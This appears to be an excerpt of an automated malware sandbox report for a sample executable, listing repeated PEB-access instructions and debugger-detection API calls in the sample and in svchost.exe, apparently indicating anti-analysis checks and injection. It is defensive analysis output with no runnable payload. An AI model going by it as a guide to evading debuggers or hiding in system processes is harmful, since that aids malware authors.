Code function: 0_2_00EC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00EC5A7C

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E94B37 LoadLibraryA,GetProcAddress,

0_2_00E94B37

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_018822C8 mov eax, dword ptr fs:[00000030h]	0_2_018822C8
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_01882268 mov eax, dword ptr fs:[00000030h]	0_2_01882268
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_01880C18 mov eax, dword ptr fs:[00000030h]	0_2_01880C18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]	2_2_035D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]	2_2_035D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]	2_2_0360634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]	2_2_0352C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]	2_2_03550310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]	2_2_035EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]	2_2_035B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]	2_2_035663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]	2_2_0352A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]	2_2_03536259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]	2_2_0352826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]	2_2_0360625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]	2_2_0352823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]	2_2_036062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]	2_2_0352C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]	2_2_035F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]	2_2_03560124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]	2_2_036061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]	2_2_035601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]	2_2_03570185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]	2_2_03532050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]	2_2_035B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]	2_2_0355C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]	2_2_035B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]	2_2_035C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]	2_2_0352A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]	2_2_0352C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]	2_2_035B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0352C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]	2_2_035720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0352A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]	2_2_035380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]	2_2_035B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]	2_2_0353208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]	2_2_035280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]	2_2_035C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]	2_2_03530750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]	2_2_035BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]	2_2_035B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]	2_2_03538770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
